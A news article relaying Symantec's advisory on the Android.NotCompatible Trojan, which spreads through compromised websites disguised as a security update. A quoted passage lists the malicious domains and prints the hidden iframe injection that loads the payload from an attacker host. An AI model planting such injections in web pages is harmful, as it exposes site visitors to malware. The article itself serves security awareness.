Android Malware

New Android Malware Spreading Via Infected Websites

Android Malware
Image source: wmpoweruser
Involve ad

Android users beware! Symantec Security Response has detected a new Android malware spreading via infected websites. Symantec urges Android users to be aware of the threat and be careful when visiting unknown sites.

[ad#Google Adsense 336×280]

 

Asus 336x280 ad

Symantec has observed a new Android malware threat being distributed by a handful of infected websites. Full details on this threat, detected by Symantec as Android.Notcompatible, can be found here: http://www.symantec.com/connect/blogs/website-injection-campaign-used-conjunction-android-trojan.

Android Malware

When a user visits an infected site, this Trojan is automatically downloaded to their device. Unlike a traditional drive-by download, however, the user must still manually agree to install this threat. Therefore, it has been disguised as a device security update. The threat then allows its creator to reroute data traffic from an infected device to a third-party destination.

Involve ad

Devices that allow installation from ’Unknown Sources’ are most susceptible to this type of attack as the user has to manually accept the permissions and prompts that are requested prior to an installation.

Extract from Symantec blog:

[quote] The following domains have been identified so far based on our investigation:

  • [http://]androidbia.info
  • [http://]androidjea.info
  • [http://]gaoanalitics.info
  • [http://]androidonlinefix.info

The website injection is of the form:

<iframe style=”visibility: hidden; display: none; display: none;”
src=”[http://]gaoanalitics.info/?id=[CLSID]”>;
</iframe>

This injection has been identified not only on HTML sites, but also in robots.txt files. Therefore, it could well be the case that all files on the compromised Web server will have this iframe appended to it.[/quote]

Involve ad
READ ALSO  National Instruments' Graphical System Design Summit 2013 in Southeast Asia Kicks Off in Malaysia

This threat highlights how mobile malware authors are moving beyond traditional “smash-and-grab” activities, such as premium SMS scams, and towards more sophisticated assaults, such as theft of sensitive information.

  • Show Comments

Your email address will not be published. Required fields are marked *

comment *

  • name *

  • email *

  • website *

This site uses Akismet to reduce spam. Learn how your comment data is processed.